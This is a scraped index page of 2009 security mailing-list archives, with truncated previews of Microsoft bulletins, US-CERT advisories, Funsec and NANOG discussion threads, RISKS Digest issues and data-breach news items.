Title: Microsoft Security Bulletin Major Revisions
Issued: October 27, 2009
********************************************************************

Summary
=======
The following bulletins have undergone a major revision increment.
Please see the appropriate bulletin for more details.

* MS09-043 - Critical

Bulletin Information:
=====================

* MS09-043 - Critical

-...

Microsoft Security Bulletin Summary for October 2009 Microsoft (Oct 13)
********************************************************************
Microsoft Security Bulletin Summary for October 2009
Issued: October 13, 2009
********************************************************************

This bulletin summary lists security bulletins released for
October 2009.

The full version of the Microsoft Security Bulletin Summary for
October 2009 can be found at
http://www.microsoft.com/technet/security/bulletin/ms09-oct.mspx....

Microsoft Security Bulletin Major Revision Microsoft (Sep 09)
********************************************************************
Title: Microsoft Security Bulletin Major Revision
Issued: September 9, 2009
********************************************************************

Summary
=======
The following bulletin has undergone a major revision increment.
Please see the appropriate bulletin for more details.

* MS09-048 - Critical

Bulletin Information:
=====================

* MS09-048 - Critical

-...

Microsoft Security Bulletin Summary for September 2009 Microsoft (Sep 08)
********************************************************************
Microsoft Security Bulletin Summary for September 2009
Issued: September 8, 2009
********************************************************************

This bulletin summary lists security bulletins released for
September 2009.

The full version of the Microsoft Security Bulletin Summary for
September 2009 can be found at...

Microsoft Security Bulletin Major Revisions Microsoft (Aug 25)
********************************************************************
Title: Microsoft Security Bulletin Major Revisions
Issued: August 25, 2009
********************************************************************

Summary
=======
The following bulletins have undergone a major revision increment.
Please see the appropriate bulletin for more details.

* MS09-044 - Critical
* MS09-029 - Critical

Bulletin Information:
=====================

*...

Microsoft Security Bulletin Major Revisions Microsoft (Aug 11)
********************************************************************
Title: Microsoft Security Bulletin Major Revisions
Issued: August 11, 2009
********************************************************************

Summary
=======
The following bulletins have undergone a major revision increment.
Please see the appropriate bulletin for more details.

* MS09-035 - Moderate
* MS09-029 - Critical

Bulletin Information:
=====================

*...

Microsoft Security Bulletin Summary for August 2009 Microsoft (Aug 11)
********************************************************************
Microsoft Security Bulletin Summary for August 2009
Issued: August 11, 2009
********************************************************************

This bulletin summary lists security bulletins released for
August 2009.

The full version of the Microsoft Security Bulletin Summary for
August 2009 can be found at
http://www.microsoft.com/technet/security/bulletin/ms09-aug.mspx....

Microsoft Security Bulletin Major Revisions Microsoft (Aug 06)
********************************************************************
Title: Microsoft Security Bulletin Major Revisions
Issued: August 4, 2009
********************************************************************

Summary
=======
The following bulletins have undergone a major revision increment.
Please see the appropriate bulletin for more details.

* MS09-034 - Critical

Bulletin Information:
=====================

* MS09-034 - Critical

-...

Microsoft Security Bulletin Summary for July 2009 Microsoft (Jul 28)
********************************************************************
Microsoft Security Bulletin Summary for July 2009
Issued: July 28, 2009
********************************************************************

This bulletin summary lists out-of-band security bulletins released
on July 28, 2009.

The full version of the Microsoft Security Bulletin Summary for
July 2009 can be found at...

Funsec — While most security lists ban off-topic discussion, Funsec is a haven for free community discussion and enjoyment of the lighter, more humorous side of the security community

Re: Was the ClimateGate Hacker Justified? Join the Debate! Gadi Evron (Nov 26)
Florian Weimer wrote:

Politics is a fact of life, and taking it into consideration is fine.
However, plain lying is an issue.

Take vaccinations for example. They are in the vast majority safe, and
if the populaton isn't innoculated, rather than the person, shit
happens. And yet the entire industry just insists they are PERFECTLY
SAFE. NO RISKS. NO DISCUSSION. Any discussion will make less people
innoculate, which is counter-productive for...

Re: Was the ClimateGate Hacker Justified? Join the Debate! Florian Weimer (Nov 26)
* Gadi Evron:

They must be a very happy bunch indeed if they care more about the
denialists than about their funding.

Perhaps scientists tend to have quite different ethical standards,
maimed by the unique kinds of compromises which life forces upon them.
I once witnessed a few people submitting a CS conference paper which
was cute, cleverly dressed BS, and when I pointed this out, they told
me that the program committee would never notice it,...

Re: Was the ClimateGate Hacker Justified? Join the Debate! Gadi Evron (Nov 26)
Valdis.Kletnieks () vt edu wrote:

Have you been caught? Did you just spin the data by framing it, or lie
about it completely? Did you sin to being a scientist and lose your
moral highground? Have you conspired in EMAIL?

If you answered yes to 2 of these...

And we are not talking about whether the politics of the scientists were
well played, or horrendous. We speak of the hacker.

Gadi.

Re: Was the ClimateGate Hacker Justified? Join the Debate! Valdis . Kletnieks (Nov 26)
On Thu, 26 Nov 2009 19:11:10 +0200, Gadi Evron said:

OK Gadi, if I had sent you a link to this photo:

http://www.xenophilia.com/zb/zb0008/essa-7-19681123.jpg

and attached the text "Don't let the hollow-earther idiots see this, they'll
jump all over it", would I be part of the conspiracy trying to conceal the
existence of a hollow earth? Just sayin'...

Yes, you know and I know that it's a composite of multiple pictures, and
the dark...

Re: Was the ClimateGate Hacker Justified? Join the Debate! Drsolly (Nov 26)
Hey! My god isn't laughable, as you will discover next time you try to
eat spaghetti.

Re: Was the ClimateGate Hacker Justified? Join the Debate! Gadi Evron (Nov 26)
Rich Kulawiec wrote:

Dude, some of it is obviously out of context, and some of it can be
explained away as terminology. But some emails CLEARLY state to delete
data for the sole purpose of hiding it from the denialist "idiots",
rather than any other reason. The emails have been verified as true.

So, while this does not necessarily change any facts on climate change,
don't bury your head in the sand about these lying bastard...

Re: Was the ClimateGate Hacker Justified? Join the Debate! Rich Kulawiec (Nov 26)
This is complete nonsense, of course. I'm sure to some non-scientists,
who lack the proper education and don't understand the language used
by scientists to communicate with each other, it looks that way,
however this has already been quite, quite thoroughly debunked.

I look down with contempt on the inferior creatures who are dumb enough
to fall for this denialist nonsense. They belong with the creationists,
the flat-earthers, and other...

Re: WTF! Or, wow, this never happened to me before! Steve Manzuik (Nov 26)
You clearly missed a great opportunity to start your own fire, toss a chair through a window, and run from the room
screaming.

Re: WTF! Or, wow, this never happened to me before! Drsolly (Nov 26)
I would have said "Everyone follow me" and left the building.

My worst course interruption happened when a duck fight broke out, just
outside the course room. We just had to stop everything and watch the
ducks fight it out.

Re: WTF! Or, wow, this never happened to me before! Drsolly (Nov 26)
That reminds me - I was doing a breakfast seminar, and one of the waiters
trolleys caught fire. A hard act to follow....

Was the ClimateGate Hacker Justified? Join the Debate! Gadi Evron (Nov 26)
A few days ago a story broke where someone hacked into a global warming
research institute and stole all emails from the past 10 years, proving
a conspiracy.

In the vast amount of emails stolen, some emails were also found with
clear-cut lies, showing how some scientists conspired to deceive in
scientific research about data that did not fit their agenda of proving
global warming.

Join the debate mailing list, now! :)...

Ikeee worm author gets a job developing iPhone apps Jason Ross (Nov 26)
*sigh*
way to send the right message...

http://www.virusexperts.org/security-news/ikee-worm-author-gets-job-at-iphone-app-firm/

Re: Gee, what a surprise: RFID is dangerous ... David Lodge (Nov 26)
The UK got this is passports a few years ago, and one of my credit cards
now has RFID on it.

I went the low tech way to stop this and got a portable farraday cage
wallet: http://www.thinkgeek.com/gadgets/security/8cdd/

Both the passport and credit card have a wireless symbol on it (though
they're both different).

I still don't trust them :-)

dave

Re: Gee, what a surprise: RFID is dangerous ... Dragos Ruiu (Nov 25)
Doubt they could make that truly fly. ;-P

Do they come with built in tasers/cattle-prod modes yet? ;-);-P:-)

cheers,
--dr

Re: Gee, what a surprise: RFID is dangerous ... Dragos Ruiu (Nov 25)
Don't forget that they can now be used on door locks too in Japan so
you can lose your house keys
with your keitai/phone.

Telus and Visa are doing some RF based transaction trials here in
western Canada. They are slowly
trying to deploy rf aware customer terminals.

My best gossip is that an IC(rfidcurrency, my monicker) chip will be
built into the next rev iphone too.
My bet is that it will be in pretty much most next phone hardware revs...

CERT Advisories — The Computer Emergency Response Team has been responding to security incidents and sharing vulnerability information since the Morris Worm hit in 1986. This archive combines their technical security alerts, bulletins, tips, and current activity lists.

Current Activity - Malicious Code Circulating via Social Security Administration Phishing Messages Current Activity (Nov 24)
US-CERT Current Activity

Malicious Code Circulating via Social Security Administration Phishing Messages

Original release date: November 24, 2009 at 2:42 pm
Last revised: November 24, 2009 at 2:42 pm

US-CERT is aware of public reports of malicious code circulating via
phishing email messages that appear to come from the Social Security
Administration. The messages indicate that the users' annual Social
Security statements may contain errors...

Current Activity - Microsoft Releases Security Advisory 977981 Current Activity (Nov 23)
US-CERT Current Activity

Microsoft Releases Security Advisory 977981

Original release date: November 23, 2009 at 8:51 pm
Last revised: November 23, 2009 at 8:51 pm

Microsoft has released security advisory 977981 to address a
vulnerability in Microsoft Internet Explorer. This vulnerability may
allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review Microsoft
Security Advisory 977981 and implement the...

SB09-327 -- Vulnerability Summary for the Week of November 16, 2009 US-CERT Security Bulletins (Nov 23)
Vulnerability Summary for the Week of November 16, 2009

This bulletin provides a summary of new vulnerabilities that have been
recorded by the National Institute of Standards and Technology (NIST)
National Vulnerability Database (NVD) the week of November 16, 2009. It is
available here:

http://www.us-cert.gov/cas/bulletins/SB09-327.html

For instructions on subscribing to or unsubscribing from this
mailing list, visit <...

Cyber Security Tip ST04-016 -- Recognizing and Avoiding Spyware US-CERT Security Tips (Nov 19)
National Cyber Alert System
Cyber Security Tip ST04-016

Recognizing and Avoiding Spyware

Because of its popularity, the internet has become an ideal target for
advertising. As a result, spyware, or adware, has become increasingly
prevalent. When troubleshooting problems with your computer, you may
discover that the source of the problem is spyware software that has been
installed on your machine without your knowledge....

SB09-320 -- Vulnerability Summary for the Week of November 9, 2009 US-CERT Security Bulletins (Nov 16)
Vulnerability Summary for the Week of November 9, 2009

This bulletin provides a summary of new vulnerabilities that have been
recorded by the National Institute of Standards and Technology (NIST)
National Vulnerability Database (NVD) the week of November 9, 2009. It is
available here:

http://www.us-cert.gov/cas/bulletins/SB09-320.html

For instructions on subscribing to or unsubscribing from this
mailing list, visit <...

Current Activity - Microsoft Releases Security Advisory 977544 Current Activity (Nov 16)
US-CERT Current Activity

Microsoft Releases Security Advisory 977544

Original release date: November 16, 2009 at 9:21 am
Last revised: November 16, 2009 at 9:21 am

Microsoft has released security advisory 977544 to address a
vulnerability in the Server Message Block (SMB) protocol. This
vulnerability may allow an attacker to cause a denial-of-service
condition. This vulnerability only affects Windows 7 and Server 2008
software.

US-CERT...

Current Activity - Apple Releases Safari 4.0.4 Current Activity (Nov 12)
US-CERT Current Activity

Apple Releases Safari 4.0.4

Original release date: November 12, 2009 at 8:08 am
Last revised: November 12, 2009 at 8:08 am

Apple has released Safari 4.0.4 to address multiple vulnerabilities in
a number of components. Exploitation of these vulnerabilities may
allow an attacker to execute arbitrary code, cause a denial-of-service
condition, conduct cross-site request forgery, or obtain sensitive
information. These...

TA09-314A -- Microsoft Updates for Multiple Vulnerabilities US-CERT Technical Alerts (Nov 10)
National Cyber Alert System

Technical Cyber Security Alert TA09-314A

Microsoft Updates for Multiple Vulnerabilities

Original release date:
Last revised: --
Source: US-CERT

Systems Affected

* Microsoft Windows and Windows Server
* Microsoft Office Word and Excel

Overview

Microsoft has released updates to address vulnerabilities in
Microsoft Windows and Windows Server and Office...

Current Activity - Microsoft Releases November Security Bulletin Current Activity (Nov 10)
US-CERT Current Activity

Microsoft Releases November Security Bulletin

Original release date: November 10, 2009 at 1:50 pm
Last revised: November 10, 2009 at 1:50 pm

Microsoft has released an update to address vulnerabilities in
Microsoft Windows and Office as part of the Microsoft Security
Bulletin Summary for November 2009. These vulnerabilities may allow an
attacker to execute arbitrary code, cause a denial-of-service
condition, or operate...

Current Activity - Apple Releases Mac OS X v10.6.2 and Security Update 2009-006 Current Activity (Nov 10)
US-CERT Current Activity

Apple Releases Mac OS X v10.6.2 and Security Update 2009-006

Original release date: November 10, 2009 at 8:02 am
Last revised: November 10, 2009 at 8:02 am

Apple has released Mac OS X v10.6.2 and Security Update 2009-006 to
address multiple vulnerabilities in a number of applications. These
vulnerabilities may allow an attacker to execute arbitrary code, cause
a denial-of-service condition, conduct a man-in-the-middle...

SB09-313 -- Vulnerability Summary for the Week of November 2, 2009 US-CERT Security Bulletins (Nov 09)
Vulnerability Summary for the Week of November 2, 2009

This bulletin provides a summary of new vulnerabilities that have been
recorded by the National Institute of Standards and Technology (NIST)
National Vulnerability Database (NVD) the week of November 2, 2009. It is
available here:

http://www.us-cert.gov/cas/bulletins/SB09-313.html

For instructions on subscribing to or unsubscribing from this
mailing list, visit <...

Current Activity - SSL and TLS Vulnerable to Man-in-the-middle Attacks Current Activity (Nov 06)
US-CERT Current Activity

SSL and TLS Vulnerable to Man-in-the-middle Attacks

Original release date: November 6, 2009 at 7:01 pm
Last revised: November 6, 2009 at 7:01 pm

US-CERT is aware of reports of publicly available exploit code for a
vulnerability within the SSL and TLS protocols. Reports indicate that
exploitation of this vulnerability may allow an attacker to conduct a
man-in-the-middle attack, allowing an attacker to inject plaintext...

Current Activity - Microsoft Releases Advance Notification for November Security Bulletin Current Activity (Nov 05)
US-CERT Current Activity

Microsoft Releases Advance Notification for November Security Bulletin

Original release date: November 5, 2009 at 4:17 pm
Last revised: November 5, 2009 at 4:17 pm

Microsoft has issued a Security Bulletin Advance Notification
indicating that its November release cycle will contain six bulletins,
three of which will have a severity rating of Critical. The
notification states that these Critical bulletins are for...

Current Activity - BlackBerry Desktop Manager Vulnerability Current Activity (Nov 05)
US-CERT Current Activity

BlackBerry Desktop Manager Vulnerability

Original release date: November 5, 2009 at 8:45 am
Last revised: November 5, 2009 at 8:45 am

Research in Motion has released Security Advisory KB19701 to address a
vulnerability in BlackBerry Desktop Manager. This vulnerability may
allow an attacker to execute arbitrary code.

US-CERT encourages users to review BlackBerry Security Advisory
KB19701 and apply any necessary...

Cyber Security Tip ST04-015 -- Understanding Denial-of-Service Attacks US-CERT Security Tips (Nov 04)
Cyber Security Tip ST04-015
Understanding Denial-of-Service Attacks

You may have heard of denial-of-service attacks launched against websites,
but you can also be a victim of these attacks. Denial-of-service attacks can
be difficult to distinguish from common network activity, but there are some
indications that an attack is in progress.

What is a denial-of-service (DoS) attack?

In a...

Open Source Security — Discussion of security flaws, concepts, and practices in the Open Source community

NANOG — The North American Network Operators' Group discusses fundamental Internet infrastructure issues such as routing, IP address allocation, and containing malicious activity.

Re: What DNS Is Not Dan White (Nov 26)
That's a disagreement we'll have to have. Anytime this issue has been brought
up in a public setting (here, slashdot, etc.) has resulted in terrible press
and even corrective action. In particular, Network Solutions' attempt to
at this at the .com level was corrected. Of course I don't know what, if
any, ICANN pressure has to do with that, but the flash light practice was
apparently successful.

Re: What DNS Is Not Florian Weimer (Nov 26)
* Jorge Amodio:

First, stop calling it "NXDOMAIN rewriting". These guys are rewriting
everything they want, so that they can respond to your search queries,
or serve different ads to you.

Then try to opt out of rewriting for your own domains, asking the
offenders to stop doing it in your namespace, and if that doesn't
help, use the court system. Fight your own fights, and don't expect
others to do it for you. (Oh, in case you...

Re: What DNS Is Not Paul Vixie (Nov 26)
the endgame for provider-in-the-middle attacks is enduser validators, which
is unfortunate since this use case is not well supported by current DNSSEC
and so there's some more protocol work in our future ("noooooooooooo!!").

i also expect to see DNS carried via HTTPS, which providers tend to leave
alone since they don't want to hear from the lawyers at 1-800-flowers.com.
(so, get ready for...

ARIN/RIPE NCC Joint Statement on ASN Assignment Discrepancies John Curran (Nov 26)
ARIN and the RIPE NCC have worked together to research the issues with
the Autonomous System Number (ASN) range AS1707-AS1726. Below is our
analysis of what happened and a plan to resolve these issues.

It appears that prior to 1993, Renater was issued AS1707 with an AS
name of "ASNBLOCKA". This is the name format used to assign a block
of ASNs, but the DDN NIC (the Defense Data Network Network Information
Center, which was responsible...

Re: What DNS Is Not David Conrad (Nov 26)
As you know, as long as people rely on their ISPs for resolution services, DNSSEC isn't going to help. Where things
get really offensive if when the ISPs _require_ customers (through port 53 blocking, T-Mobile Hotspot, I'm looking at
you) to use the ISP's resolution services.

Regards,
-drc

Re: What DNS Is Not David Conrad (Nov 26)
Hi,

In the sense that they allocate /8s (and, in IPv6, /12s) to the RIRs, sure. I'm just guessing but I don't think the
RIRs would be very happy if ICANN/IANA were to refuse to allocate a /8 (or a /12) to an RIR because one of the RIRs'
customers was hijacking NXDOMAINs.

Actually, ICANN/IANA assigns these directly (see http://pen.iana.org), but I suspect the folks in the IETF would get a
bit distressed if ICANN/IANA started imposing...

Re: Who has AS 1712? Michael Dillon (Nov 26)
Using RSS.

Doesn't ARIN already announce all allocations via RSS?

--Michael Dillon

Re: I got a live one! - Spam source Rich Kulawiec (Nov 26)
Without delving too far into this: there is no point whatsoever in attempting
to conceal or obfuscate email addresses --not any more. It is an obsolete,
"cargo cult" practice that many are still engaged in without grasping that
it was quite thoroughly defeated by spammers and their associates years ago.

That said, I concur in full with your opinions in re whois data and
the need to assign it properly. I've long since stopped trying...

Re: I got a live one! - Spam source Steve Linford (Nov 26)
Classic snowshoe spam setup, probably a professional snowshoe spam
outfit known to Spamhaus as 'Tactara' and 'Webzero'.

Snowshoe spam operations operate by contacting ISP pretending to be
'IP space brokers', they buy lots of IP space and have it all SWIPed
in small chunks, mostly /24s, to an endless array of anonymous
Wyoming and Delaware shell companies at UPS mailboxes. They then fill
the /24s with freshly-registered 'nonsense'...

Re: Multicast LDP or P2MP RSVP & LDP devang patel (Nov 25)
Rob,

Can you share some documentation with me on how to configure as well as any
kind of configuration example will be great help.

Thanks,
Devang

Re: Multicast LDP or P2MP RSVP & LDP Rob Shakir (Nov 25)
Hi Devang,

To the best of my knowledge, the only current P2MP LSP implementation
available is in JunOS [0]. The guys at Juniper wrote a draft relating
to their experience with scaling and implementing P2MP MVPN [1], which
is worth a look -- this draft mentions that IOS XR has an
implementation, although I struggled to find any documentation that
confirms this.

Both the LDP-based [2] P2MP standard are still in draft status, but
the...

Multicast LDP or P2MP RSVP & LDP devang patel (Nov 25)
Hi All,

I just want to know about the deployment of Multicast LDP or P2MP RSVP and
LDP is available from any vendor or they are still in draft status? Also it
will be great if some one can give me an idea of Multicast VPN deployment in
service providers; are they deployed with draft Rosen GRE based solution or
BGP auto discovery mechanism?

Thanks in advance for help...

regards,
Devang

Re: What DNS Is Not bmanning (Nov 25)
any more.... :)

--bill

Re: What DNS Is Not Paul Vixie (Nov 25)
Jorge Amodio <jmamodio () gmail com> writes:

we have to fix DNS so that provider-in-the-middle attacks no longer work.
(this is why in spite of its technical excellence i am not a DNSCURVE fan,
and also why in spite of its technical suckitude i'm working on DNSSEC.)

<http://queue.acm.org/detail.cfm?id=1647302> lays out this case.

AUTO: Lumír Srch ml. is out of office Lumir Srchlm (Nov 25)
I am out of the office until 30.11.2009.

Na Vas e-mail odpovim co nejdrive. V pripade urgentnich problemu prosim
kontaktujte helpdesk.

I will answer your e-mail as soon as possible. Your e-mail will not be
forwarded. Please contact helpdesk for urgent issues.

Dekuji za pochopení
Lumir Srch ml.

Note: This is an automated response to your message "Re: I got a live one!
- Spam source" sent on 26.11.09 1:16:53.

This is the only...

Interesting People — David Farber moderates this list for discussion involving internet governance, infrastructure, and any other topics he finds fascinating

The RISKS Forum — Peter G. Neumann moderates this regular digest of current events which demonstrate risks to the public in computers and related systems. Security risks are often discussed.

Risks Digest 25.84 RISKS List Owner (Nov 25)
RISKS-LIST: Risks-Forum Digest Weds 25 November 2009 Volume 25 : Issue 84

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.84.html>
The current issue can be...

Risks Digest 25.83 RISKS List Owner (Nov 06)
RISKS-LIST: Risks-Forum Digest Friday 6 November 2009 Volume 25 : Issue 83

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.83.html>
The current issue can be...

Risks Digest 25.82 RISKS List Owner (Oct 20)
RISKS-LIST: Risks-Forum Digest Tuesday 20 October 2009 Volume 25 : Issue 82

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.82.html>
The current issue can be...

Risks Digest 25.81 RISKS List Owner (Oct 12)
RISKS-LIST: Risks-Forum Digest Monday 12 October 2009 Volume 25 : Issue 81

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.81.html>
The current issue can be...

Risks Digest 25.80 RISKS List Owner (Oct 09)
RISKS-LIST: Risks-Forum Digest Friday 9 October 2009 Volume 25 : Issue 80

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.80.html>
The current issue can be...

Risks Digest 25.79 RISKS List Owner (Sep 25)
RISKS-LIST: Risks-Forum Digest Friday 25 September 2009 Volume 25 : Issue 79

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.79.html>
The current issue can...

Risks Digest 25.78 RISKS List Owner (Sep 14)
RISKS-LIST: Risks-Forum Digest Monday 14 September 2009 Volume 25 : Issue 78

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.78.html>
The current issue can...

Risks Digest 25.77 RISKS List Owner (Sep 01)
RISKS-LIST: Risks-Forum Digest Tuesday 1 September 2009 Volume 25 : Issue 77

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.77.html>
The current issue can...

Risks Digest 25.76 RISKS List Owner (Aug 15)
RISKS-LIST: Risks-Forum Digest Saturday 15 August 2009 Volume 25 : Issue 76

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.76.html>
The current issue can be...

Risks Digest 25.75 RISKS List Owner (Aug 06)
RISKS-LIST: Risks-Forum Digest Thursday 6 August 2009 Volume 25 : Issue 75

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.75.html>
The current issue can be...

Risks Digest 25.74 RISKS List Owner (Jul 22)
RISKS-LIST: Risks-Forum Digest Wednesday 22 July 2009 Volume 25 : Issue 74

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.74.html>
The current issue can be...

Risks Digest 25.73 RISKS List Owner (Jul 16)
RISKS-LIST: Risks-Forum Digest Thursday 16 July 2009 Volume 25 : Issue 73

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.73.html>
The current issue can be...

Risks Digest 25.72 RISKS List Owner (Jul 06)
RISKS-LIST: Risks-Forum Digest Monday 6 July 2009 Volume 25 : Issue 72

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/25.72.html>
The current issue can be...

Data Loss — Data Loss covers large-scale personal data loss and theft incidents. This archive combines the main list (news releases) and the discussion list.

WI: Laptop With Personal Information Stolen From Aurora St. Luke's lyger (Nov 25)
http://www.wisn.com/news/21726827/detail.html

A Milwaukee hospital is warning thousands of its patients that personal
information about them may have been stolen.

The theft happened at Aurora St. Luke's Medical Center on Milwaukee's
south side.

More than 6,000 people, who were in-patients here at St. Luke's will be
getting a letter in the mail. It warns them that their name, Social
Security number and other information may have landed in...

Investigation, Class Action Lawsuit, Cast Shadow Over Radiant Systems and Distributor security curmudgeon (Nov 24)
http://www.prlog.org/10425165-secret-service-investigation-class-action-lawsuit-cast-shadow-over-radiant-systems-and-distributo.html

Secret Service Investigation, Class Action Lawsuit, Cast Shadow Over
Radiant Systems and Distributor

Atlanta Company and Distributor Accused of Negligence in Widespread
Identity Theft at Restaurants

FOR IMMEDIATE RELEASE
PR Log (Press Release) Nov 23, 2009 Secret Service Investigation and
Class Action...

ACORN Dumped Sensitive Documents as Probe Began, Private Investigator Says security curmudgeon (Nov 24)
http://www.foxnews.com/story/0,2933,576466,00.html

ACORN Dumped Sensitive Documents as Probe Began, Private Investigator Says
Monday, November 23, 2009
By Joseph Abrams

Private investigator Derrick Roach says he found thousands of documents
containing sensitive personal information dumped outside the San Diego
branch of ACORN.

Private investigator Derrick Roach says he found thousands of documents
containing sensitive personal information...

Hancock Fabrics ATM Fraud security curmudgeon (Nov 23)
---------- Forwarded message ----------
From: Dave Farber <dave () farber net>
To: ip <ip () v2 listbox com>

Begin forwarded message:

From: James McMurry <jmcmurry () me com>
Date: November 23, 2009 12:51:42 PM EST
To: dave () farber net
Subject: Hancock Fabrics ATM Fraud

http://www.bankinfosecurity.com/articles.php?art_id=1961

Bank customers in California, Wisconsin and Missouri are reporting
fraudulent ATM withdrawals...

MD: Woman Sentenced For Stealing Patients' Info lyger (Nov 23)
(this ties to:
http://datalossdb.org/incidents/1779-hospital-employee-steals-patients-credit-to-obtain-credit-cards-goods-and-loans
- over 100 stolen, but over 10,000 notified...)

http://wjz.com/wireapnewsmd/Woman.sentenced.for.2.1325015.html

A woman who worked as a patient services coordinator for Johns Hopkins
Medicine has been sentenced to 18 months in prison for stealing patient
information.

Thirty-one-year-old Michelle Courtney...

FBI looking at UMC records leak security curmudgeon (Nov 23)
---------- Forwarded message ----------
From: InfoSec News <alerts () infosecnews org>

http://www.lasvegassun.com/news/2009/nov/21/fbi-looking-umc-records-leak/

By Marshall Allen
The Las Vegas Sun
Nov. 21, 2009

The FBI said Friday it may investigate a breach of patient privacy laws at
University Medical Center, where hospital officials are reeling with the
realization that at least one of their employees has leaked confidential
names,...

IN: Notre Dame security breach potentially affects employees lyger (Nov 21)
http://www.wndu.com/localnews/headlines/70674717.html

Notre Dame is warning university employees to keep an eye on their bank
accounts after a security breach.

Personal information of some past and current employees - including name,
social security number and birth date - was accidentally put onto a public
website.

University spokesman Dennis Brown says the error was corrected and the
information removed from the website.

[...]

Mass Mutual Unknown Al (Nov 20)

http://www.net-security.org/secworld.php?id=8521

the latest data breach to be discovered happened to MassMutual, a
Massachussets-based insurance company. One of the company's employees
databases was accessed by a (so far) unknown unauthorized individual.

MassMutual stated that maintenance of the database in question was outsorced
to a third-party vendor, who upon the discovery of the breach hired
forensics specialists to investigate and get...

Hospitals tighten security on patient data security curmudgeon (Nov 20)
---------- Forwarded message ----------
From: InfoSec News <alerts () infosecnews org>

http://fcw.com/articles/2009/11/18/hospitals-beefing-up-cybersecurity-to-comply-with-hitech-survey-says.aspx

By Alice Lipowicz
FCW.com
Nov 18, 2009

More than half of the nation's hospitals and health care providers
surveyed intend to buy more cybersecurity tools to safeguard against
breaches of electronic medical records as a result of requirements...

TADGEAR, Inc. breach notice security curmudgeon (Nov 19)
https://www.tadgear.com/content.php?id=38

This notice is to inform our customers of a security incident at TAD Gear.
We recently learned that our database was illegally accessed from an
external source, and it appears that some customer data were taken, which
may include customer names, contact information and credit card data.
The possibility of a security breach came to our attention when certain
customers notified us that unauthorized...

1.5 Million Medical Files At Risk In Health Net Data Breach kirniki (Nov 19)
http://www.courant.com/health/hc-healthbreach1119.artnov19,0,1798384.story

A hard drive with seven years of personal and medical information on
about 1.5 million Health Net customers, including 446,000 in
Connecticut, was lost six months ago and was first reported Wednesday,
state and company officials said.

The insurance company informed the state attorney general's office and
the Department of Insurance Wednesday of the security breach that...

PA: 80, 000 Mailers Sent Out With Recipients' Social Security Numbers In Plain View kirniki (Nov 18)
http://www.wgal.com/news/21655737/detail.html

ELIZABETHTOWN, Pa. -- Check your mailbox. Thousands of Pennsylvanians
could become victims of identity theft just because a piece of mail
has been sent to their homes.

Right on the front of the piece of mail, in plain view, is the
recipient's Social Security number. Tens of thousands of Medicare
recipients may be at risk.

Delores and Frank Ember, of Elizabethtown, simply could not believe
what they...

Germany in 'credit card recall' lyger (Nov 18)
http://news.bbc.co.uk/2/hi/business/8365828.stm

